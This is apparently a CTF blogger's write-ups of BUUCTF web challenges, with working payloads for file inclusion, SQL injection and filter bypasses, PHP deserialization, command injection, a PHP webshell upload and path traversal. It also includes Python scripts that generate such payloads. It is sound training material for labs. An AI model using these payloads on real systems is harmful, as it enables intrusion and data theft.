follow my dream

buuctf_0x02

2020/05/28

0x01 Week

web

[极客大挑战 2019]Secret File

Follow the hints all the way to secr3t.php:

```php
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
// blacklist: "../", "tp" (which also kills http/ftp), "input" and "data"; "filter" is not on it
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
// the flag is in flag.php
?>
</html>
```

Use the php://filter wrapper, which the blacklist does not cover, to read the source as base64 instead of executing it:

```
php://filter/convert.base64-encode/resource=flag.php
```

Decoded flag.php:

```html
<!DOCTYPE html>

<html>

<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>

<body style="background-color:black;"><br><br><br><br><br><br>

<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>

<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在这里";
$flag = 'flag{51e7f07f-2e27-445a-ae66-4341c6252450}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>

</html>
```

[极客大挑战 2019]PHP

The hint points at a source-code leak, so brute-force file names:

```shell
python3 .\dirsearch.py -u "http://3fe07257-2515-4fc0-b3b6-dcd182c6742f.node3.buuoj.cn/" -e php --delay 1
```

It finds www.zip.

Note: too many requests trigger HTTP 429, hence the delay.

```
└─[极客大挑战 2019]PHP1
  └─www
      class.php
      flag.php
      index.js
      index.php
      style.css
```
  • index.php
```php
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
```
  • class.php
```php
<?php
include 'flag.php';


error_reporting(0);


class Name{
private $username = 'nonono';
private $password = 'yesyes';

public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}

function __wakeup(){
$this->username = 'guest';
}

function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();


}
}
}
?>
```

The trick is bypassing __wakeup().

__wakeup() resets username to 'guest', so it must not run. When the property count in the serialized string is larger than the real number of properties, PHP skips __wakeup() (CVE-2016-7124, fixed in PHP 5.6.25 and 7.0.10, so the target runs something older). Two more details: both properties are private, so their serialized names carry \0Name\0 prefixes, which have to be sent URL-encoded as %00; and __destruct() compares the password loosely (!= 100), so i:100 passes, while username must be exactly 'admin'.

Generate the string locally with the same class:

```php
<?php
#include 'flag.php';


error_reporting(0);


class Name{
private $username = 'nonono';
private $password = 'yesyes';

public function __construct(){
$this->username = 'admin';
$this->password = 100;
}
}

$a = new Name();

$aa = serialize($a);
echo $aa;
```

Then bump the property count from 2 to 3 and encode the null bytes:

```
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
```

[极客大挑战 2019]LoveSQL

This challenge hammered home that sometimes the payload isn't useless; you just forgot to encode it...

Error-based injection:

```
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select )))%23&password=1
```

XPATH syntax error: ' geek'

```
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select group_concat(table_name) from information_schema.tables where table_schema='geek' )))%23&password=1
```

XPATH syntax error: ' geekuser,l0ve1ysq1'

```
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select mid(group_concat(column_name),1,32)from information_schema.columns where table_schema='geek'  and table_name= 'geekuser')))%23&password=1
```

XPATH syntax error: ' id,username,password'

```
and  updatexml(1,concat(0x7e,(select group_concat(username) from geek.geekuser),0x7e),1)
--+
and updatexml(1,concat(0x7e,(select mid(group_concat(password),25,40) from geek.geekuser),0x7e),1)
%23&password=1
```

Result:

```
username=admin&password=d5e5cfb07c326d6707635db2357de47
```

...which is useless.

Trying another approach, I found that UNION queries work as well. Ugh.

Query the l0ve1ysq1 table directly:

```
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1'  union select 1,2,group_concat(password) from geek.l0ve1ysq1%23&password=1
```

The flag is in the last part of the password column.

[极客大挑战 2019]Knife

Connect directly with a webshell client; the flag is at /flag.

0x02 Week

I want to reproduce challenges from recent competitions.

web

[网鼎杯 2018]Fakebook

The injection point is

```
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1
```

Fuzzing shows that the error-based injection functions are still usable, so list the schemas in 32-character windows:

```
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(schema_name) from information_schema.schemata),1,32),'~')))

http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(schema_name) from information_schema.schemata),32,64),'~')))
```

Result:

fakebook,information_schema,mysql,performance_schema,test

Current database:

```
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(table_name) from information_schema.tables where table_schema=database() ),1,64),'~')))

[*] query error! (XPATH syntax error: '~users~')


http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' ),1,64),'~')))

[*] query error! (XPATH syntax error: '~no,username,passwd,data~')


http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(no) from users ),1,64),'~')))

[*] query error! (XPATH syntax error: '~1,2,3,4,5~')


http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(data) from users ),49,1000),'~')))

O:8:"UserInfo":3:{s:4:"name";s:2:"11";s:3:"age";i:11;s:4:"blog";s:12:"http://1.com";},O:8:"UserInfo":3:{s:4:"name";s:3:"111....
```

The data column holds serialized UserInfo objects.

Directory scanning also turns up a backup file:

/user.php.bak

```php
<?php


class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";

public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}

function get($url)
{
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);

return $output;
}

public function getBlogContents ()
{
return $this->get($this->blog);
}

public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}

}
```

The view page unserializes the stored object and fetches its blog URL with curl, so a UNION row whose data column (the fourth of no, username, passwd, data) is a serialized UserInfo with a file:// blog reads the file:

```
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no= 0/**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"fe1w0";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#
```

[极客大挑战 2019]Http

The request that satisfies the checks, with the Referer, a Syclover User-Agent and X-Forwarded-For: 127.0.0.1:

```http
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:26240
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Syclover/84.0.4133.0 Safari/537.36 Edg/84.0.508.0
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: https://www.Sycsecret.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
X-Forwarded-For: 127.0.0.1
```

[GXYCTF2019]Ping Ping Ping

Obvious command injection.

References:

https://blog.csdn.net/miuzzx/article/details/104617234

https://www.cnblogs.com/wangtanzhi/p/12246386.html

When I have time I'll organize my notes on command injection.

[ACTF2020 新生赛]Include

```php
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
// php://input, zip://, phar:// and data: are blocked; php://filter is not
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
exit('hacker!');
}
if($file){
include($file);
}else{
echo '<a href="?file=flag.php">tips</a>';
}
?>
```

```
http://f9a66afc-c568-41e2-8e62-6dc3fc6eef68.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php
```

[极客大挑战 2019]BabySQL

Manual testing shows that select, union, or, and, if and mid are stripped (the payloads below double from and where as well),

but each keyword is removed only once, so doubling it (seselectlect becomes select after the filter) gets through:

```
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' oorr 1=1--+
```

login success

6624c656c910f997ad9393630d1aca7d

```
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password='  uniunionon seselectlect  1,2, group_concat(schema_name)  frofromm  infoorrmation_schema.schemata %23
```

Your password is 'information_schema,mysql,performance_schema,test,ctf,geek'

```
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password='  uniunionon seselectlect  1,2, group_concat(table_name)  frofromm  infoorrmation_schema.tables whwhereere table_schema='ctf' %23
```

Your password is 'Flag'

```
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password='  uniunionon seselectlect  1,2, group_concat(column_name)  frofromm  infoorrmation_schema.columns whwhereere table_schema='ctf' anandd table_name='Flag'%23
```

Your password is 'flag'

```
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password='  uniunionon seselectlect  1,2, group_concat(flag)  frofromm  ctf.Flag %23
```
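An added example (not the challenge's check.php, which is not shown) that emulates a single-pass str_replace blacklist and the double-write trick against it. The keyword list is an assumption reconstructed from what the payloads above had to double; the property that matters is that the filter strips each keyword exactly once, which is what makes seselectlect survive. urlencode() also shows the %23 that the LoveSQL section warned about.

```python
import re
from urllib.parse import urlencode

# Assumed blacklist, reconstructed from the keywords the payloads above had to double;
# the challenge's real check.php is not shown.
BLACKLIST = ["union", "select", "from", "where", "or", "and", "if", "mid"]

def blacklist_filter(s: str) -> str:
    """Emulates str_replace($blacklist, '', $s): every keyword is stripped once, in list order, case-insensitively."""
    for kw in BLACKLIST:
        s = re.sub(re.escape(kw), "", s, flags=re.IGNORECASE)
    return s

# longest keyword first, so 'or' inside 'information' is still found in the same single pass
_KW = re.compile("|".join(re.escape(k) for k in sorted(BLACKLIST, key=len, reverse=True)), re.IGNORECASE)

def double_write(payload: str) -> str:
    """Insert every blacklisted word into the middle of each of its occurrences, in one pass over the
    original text. Stripping the inner copy leaves the outer one: select -> selselectect, or -> oorr."""
    def dup(m):
        w = m.group(0)
        h = len(w) // 2
        return w[:h] + w + w[h:]
    return _KW.sub(dup, payload)

def as_query_string(username: str, password: str) -> str:
    """Encode the form fields; the trailing # must be sent as %23 or the browser keeps it as a fragment."""
    return urlencode({"username": username, "password": password})

if __name__ == "__main__":
    p = "' union select 1,2,group_concat(schema_name) from information_schema.schemata #"
    print(blacklist_filter(p))                # the naive payload after the filter: keywords gone
    print(double_write(p))                    # what to send
    print(blacklist_filter(double_write(p)))  # what the database sees: the original query
    print(as_query_string("admin", double_write(p)))
```

The split point inside a keyword does not matter (uniunionon and ununionion both survive); what breaks the trick is a filter that loops until no keyword remains, or one that rejects the request instead of stripping.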

[极客大挑战 2019]BuyFlag

View the page source of pay.php:

```html
<!--
~~~post money and password~~~
if (isset($_POST['password'])) {
$password = $_POST['password'];
if (is_numeric($password)) {
echo "password can't be number</br>";
}elseif ($password == 404) {
echo "Password Right!</br>";
}
}
-->
```

```http
POST /pay.php HTTP/1.1
Host: f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cn
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4133.0 Safari/537.36 Edg/84.0.508.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cn/pay.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: user=1
Connection: close

password=404a&money=1e99
```

Just follow the hints: 404a fails is_numeric() yet still loosely equals 404 (PHP 7 compares a numeric-leading string by its leading number), the user=1 cookie marks the right user, and 1e99 is a huge amount of money written in four characters.

[ACTF2020 新生赛]Exec

Compared with Ping Ping Ping:

```shell
123|find / -name flag   # locate the flag file first

123|cat /flag
```

[ZJCTF 2019]NiZhuanSiWei

```php
<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
echo "Not now!";
exit();
}else{
include($file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
```

😒 HackBar on Edge isn't always reliable; the HackBar extension on Firefox is more accurate.

The text check reads from a file, so point text at php://input and POST the expected string in the body:

```
http://3eacb34b-c73c-4205-8cbe-1a2574bb0970.node3.buuoj.cn/index.php?text=php://input&file=file:///etc/passwd

[post]
welcome to the zjctf
```

Following the comment, read useless.php through php://filter:

```php
# http://3eacb34b-c73c-4205-8cbe-1a2574bb0970.node3.buuoj.cn/index.php?text=php://input&file=php://filter/convert.base64-encode/resource=useless.php
# [post] welcome to the zjctf
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
```

Payload: include useless.php (which defines Flag) and pass a serialized Flag whose file is flag.php; `echo $password` invokes __tostring(), which prints the file. The /flag/ check only applies to the file parameter, not to password.

```http
POST /index.php?text=php://input&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;} HTTP/1.1
Host: 3eacb34b-c73c-4205-8cbe-1a2574bb0970.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 20

welcome to the zjctf
```

[极客大挑战 2019]Upload

Upload a .phtml file with a GIF89a header and an image/gif content type, with the PHP written in the `<script language="php">` form instead of `<?php`:

```http
POST /upload_file.php HTTP/1.1
Host: 86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cn
Content-Length: 340
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZjya86HWY0DubZE0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4133.0 Safari/537.36 Edg/84.0.508.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundaryZjya86HWY0DubZE0
Content-Disposition: form-data; name="file"; filename="cc.phtml"
Content-Type: image/gif

GIF89a? <script language="php">eval($_REQUEST['f'])</script>
------WebKitFormBoundaryZjya86HWY0DubZE0
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryZjya86HWY0DubZE0--
```

Then connect with AntSword.

[RoarCTF 2019]Easy Java

Honestly I don't know Java; I'll look at it in class tomorrow.

WEB-INF/web.xml leak

```
WEB-INF mainly contains the following files and directories:
/WEB-INF/web.xml: the web application's configuration file, describing the servlets and other application components, their configuration and naming rules.
/WEB-INF/classes/: all class files used by the site, servlet and non-servlet classes alike, that are not packaged in a .jar.
/WEB-INF/lib/: the JAR files the application needs, i.e. jars used only by this application, such as database drivers.
/WEB-INF/src/: source directory, with the Java files laid out by package.
/WEB-INF/database.properties: database configuration file.
Detection and exploitation: find web.xml, infer the paths of the class files from it, download the class files directly, then decompile them to recover the site's source.
```

Root cause:

Web applications are often deployed behind several servers used together, to cover one server's performance weaknesses, to load-balance, or to implement a layered security policy. In such an architecture a misconfigured mapping for static directories or files can expose files such as web.xml. Detection and exploitation are as above: find web.xml, infer the class paths, download and decompile the classes to get the source. Servlet containers normally refuse to serve WEB-INF themselves; the problem appears when, for example, Nginx sits in front of Tomcat for load balancing or clustering. Nginx is not a JSP engine and does not adopt another engine's directory rules into its own configuration (that would couple them too tightly), so it serves the files. The fix is to deny WEB-INF in the Nginx configuration: location ~ ^/WEB-INF/* { deny all; } or return 404, or similar.
  • POST /Download?filename=/WEB-INF/web.xml
```xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<welcome-file-list>
<welcome-file>Index</welcome-file>
</welcome-file-list>
<servlet>
<servlet-name>IndexController</servlet-name>
<servlet-class>com.wm.ctf.IndexController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>IndexController</servlet-name>
<url-pattern>/Index</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>LoginController</servlet-name>
<servlet-class>com.wm.ctf.LoginController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginController</servlet-name>
<url-pattern>/Login</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>DownloadController</servlet-name>
<servlet-class>com.wm.ctf.DownloadController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadController</servlet-name>
<url-pattern>/Download</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>FlagController</servlet-name>
<servlet-class>com.wm.ctf.FlagController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>FlagController</servlet-name>
<url-pattern>/Flag</url-pattern>
</servlet-mapping>
</web-app>
```

Download the compiled flag controller, whose path follows from its servlet-class:

```
http://90e20284-6ad5-42e6-8e86-87aa6a2d443a.node3.buuoj.cn/Download?filename=/WEB-INF/classes/com/wm/ctf/FlagController.class
```

Decompile it; the flag string inside is base64-encoded, so decode it.

[BJDCTF2020]Easy MD5

https://blog.csdn.net/qq_19980431/article/details/83018232

https://blog.csdn.net/March97/article/details/81222922

http://cvk.posthaven.com/sql-injection-with-raw-md5-hashes

0x01

Look at the response headers.

  • md5()
Parameter   Description
string   Required. The string to hash.
raw   Optional. FALSE (the default) returns the 32-character hex digest; TRUE returns the 16 raw binary bytes.

The trick: with md5($pass, true) the return value is the 16 raw bytes, and they are concatenated straight into the SQL query.

```
content: ffifdyop
hex: 276f722736c95d99e921722cf9ed621c
raw: 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string: 'or'6]!r,b
```

The query becomes

```sql
select * from 'admin' where password=''or'6]!r,b';
-- which is effectively
select * from 'admin' where password=''or'6xxxx';
```

and MySQL casts '6]!r,b' to the number 6, which is true. The response gives the next level:

```html
<script>window.location.replace('./levels91.php')</script>
```

0x02

Source

```html
<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
// wow, glzjin wants a girl friend.
-->
```

Exploit PHP loose comparison: pick two strings whose MD5 hex digests both have the form 0e<digits>; == treats them as numeric strings, both equal to 0.

a=s1836677006a&b=s1885207154a

0x03

```php
<?php
#levell14.php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
```

  • payload

Strict comparison defeats the 0e trick, but md5() of an array returns NULL (with a warning), and NULL === NULL:

```
param1[]=1&param2[]=2
```
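The first two tricks above, reproduced in Python as an added example (not code from the challenge or from the original post). It verifies why ffifdyop works once md5($pass, true) is concatenated into SQL, and why the s1836677006a / s1885207154a pair passes ==. The query shape in build_query() is an assumption, since the challenge's PHP is not shown; the array trick for === is PHP-specific behaviour and is not reproduced here.

```python
import hashlib
import re

def raw_md5(s: str) -> bytes:
    """md5($s, true): the 16 raw digest bytes rather than the hex string."""
    return hashlib.md5(s.encode()).digest()

def raw_as_sql_text(raw: bytes) -> str:
    """How the raw bytes look once pasted into the query (latin-1 maps every byte to one char)."""
    return raw.decode("latin-1")

def breaks_quoted_compare(s: str) -> bool:
    """True when password='<raw md5>' turns into password=''or'<n>...' with a truthy <n>.
    MySQL casts the right-hand string to a number for `or`; a leading digit 1-9 makes it non-zero."""
    text = raw_as_sql_text(raw_md5(s))
    return text.startswith("'or'") and len(text) > 4 and text[4] in "123456789"

def build_query(password: str) -> str:
    """The vulnerable concatenation (assumed shape: select * from admin where password='...')."""
    return "select * from admin where password='" + raw_as_sql_text(raw_md5(password)) + "'"

_ZERO_E = re.compile(r"^0e\d+$")

def php_loose_equal_md5(a: str, b: str) -> bool:
    """md5($a) == md5($b) under PHP loose comparison: two hex digests of the form 0e<digits>
    are both numeric strings equal to 0.0, so they compare equal although they differ."""
    ha = hashlib.md5(a.encode()).hexdigest()
    hb = hashlib.md5(b.encode()).hexdigest()
    return ha == hb or (_ZERO_E.match(ha) is not None and _ZERO_E.match(hb) is not None)

if __name__ == "__main__":
    print(raw_md5("ffifdyop").hex())
    print(repr(build_query("ffifdyop")))
    print(breaks_quoted_compare("ffifdyop"), breaks_quoted_compare("password"))
    print(php_loose_equal_md5("s1836677006a", "s1885207154a"))
```

Finding a new string like ffifdyop by brute force is expensive (four fixed bytes plus a constrained fifth), which is why the same handful of magic strings appear in every writeup.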

[ACTF2020 新生赛]BackupFile

Source file

```
http://19f24e41-44d2-46bc-9763-1f20eeeda2f9.node3.buuoj.cn/index.php.bak
```

```php
<?php
include_once "flag.php";

if(isset($_GET['key'])) {
$key = $_GET['key'];
if(!is_numeric($key)) {
exit("Just num!");
}
$key = intval($key);
$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
if($key == $str) {
echo $flag;
}
}
else {
echo "Try to find out source file!";
}
```

intval() makes the key an integer, and under PHP 7's loose comparison 123 == "123ffw..." is true because the string is converted to its leading number:

```
http://19f24e41-44d2-46bc-9763-1f20eeeda2f9.node3.buuoj.cn/?key=123
```

...not very interesting.

[BUUCTF 2018]Online Tool

```php
<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
```

0x03 Week

A good chance to study the 网鼎杯 challenges I couldn't solve.

web

[网鼎杯 2020 青龙组]AreUSerialz

```php
<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

protected $op;
protected $filename;
protected $content;

function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}

public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}

private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}

private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}

private function output($s) {
echo "[Result]: <br>";
echo $s;
}

function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}

}

function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}

if(isset($_GET{'str'})) {

$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}

}
```
The hard part is knowing that from PHP 7.1 on, unserialize() ignores the declared visibility: a property serialized as public is assigned to the protected property of the same name. Knight worked through the PHP source after the contest to confirm this. Orz

With that, is_valid() is bypassed: a protected property would serialize as \0*\0name, and the \0 bytes fall outside the allowed 32..125 range, whereas a public name has none. The op must also be the integer 2 (i:2): process() compares with ==, so 2 == "2" selects read(), while __destruct() compares with ===, so i:2 is not reset to "1" before the file is read.

  • payload

Read files:

```
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:18:"/proc/self/cmdline";s:7:"content";N;}
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:43:"/etc/apache2/sites-enabled/000-default.conf";s:7:"content";N;}
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:22:"/var/www/html/flag.php";s:7:"content";N;}
```
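An added example (not from the challenge or from the original post) that builds these payloads and checks them against is_valid(): a small emulation of PHP serialize() for public, protected and private properties, with the optional property-count bump used in the [极客大挑战 2019]PHP challenge above. It also reproduces the Name, UserInfo (Fakebook) and Flag (NiZhuanSiWei) strings from earlier sections, so the helper is written once. String lengths are byte lengths, as PHP writes them, which matters for non-ASCII values.

```python
from typing import Any, List, Optional, Tuple

PUBLIC, PROTECTED, PRIVATE = "public", "protected", "private"

def prop_key(cls: str, name: str, vis: str) -> str:
    """Serialized property name: protected -> \\0*\\0name, private -> \\0Class\\0name, public -> name."""
    if vis == PROTECTED:
        return "\0*\0" + name
    if vis == PRIVATE:
        return "\0" + cls + "\0" + name
    return name

def php_value(v: Any) -> str:
    """serialize() for the scalar types these payloads need (None, bool, int, str)."""
    if v is None:
        return "N;"
    if isinstance(v, bool):
        return "b:%d;" % int(v)
    if isinstance(v, int):
        return "i:%d;" % v
    if isinstance(v, str):
        return 's:%d:"%s";' % (len(v.encode("utf-8")), v)   # PHP counts bytes, not characters
    raise TypeError("unsupported value type: %r" % type(v))

def php_object(cls: str, props: List[Tuple[str, Any, str]], count: Optional[int] = None) -> str:
    """O:<len>:"<cls>":<count>:{...}. A count larger than the real number of properties makes
    PHP < 5.6.25 / 7.0.10 skip __wakeup() (CVE-2016-7124)."""
    body = "".join(php_value(prop_key(cls, n, vis)) + php_value(v) for n, v, vis in props)
    n = len(props) if count is None else count
    return 'O:%d:"%s":%d:{%s}' % (len(cls), cls, n, body)

def is_valid(s: str) -> bool:
    """The AreUSerialz gate: every character must be in ASCII 32..125."""
    return all(32 <= ord(ch) <= 125 for ch in s)

def url_nulls(s: str) -> str:
    """Show \\0 as %00 for pasting into a URL; everything else is left readable."""
    return s.replace("\0", "%00")

if __name__ == "__main__":
    # AreUSerialz: write the protected fields as public so no \0 byte reaches is_valid()
    fh = [("op", 2, PUBLIC), ("filename", "/var/www/html/flag.php", PUBLIC), ("content", None, PUBLIC)]
    print(php_object("FileHandler", fh), is_valid(php_object("FileHandler", fh)))
    # [极客大挑战 2019]PHP: private names need prefixes, count bumped 2 -> 3 to skip __wakeup()
    print(url_nulls(php_object("Name", [("username", "admin", PRIVATE), ("password", 100, PRIVATE)], count=3)))
    # Fakebook and NiZhuanSiWei: plain public properties
    print(php_object("UserInfo", [("name", "fe1w0", PUBLIC), ("age", 0, PUBLIC), ("blog", "file:///var/www/html/flag.php", PUBLIC)]))
    print(php_object("Flag", [("file", "flag.php", PUBLIC)]))
```

Switching the visibility to PROTECTED in the FileHandler list makes is_valid() return False, which is exactly the wall the contest version put up.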

Read the source carefully.

[网鼎杯 2020 青龙组]filejava

This challenge leaks web.xml through a path traversal in the download servlet.

Download /etc/passwd and web.xml:

```
http://ip/DownloadServlet?filename=../../../../../../../../../etc/passwd
http://ip/DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml
```

web.xml

```xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
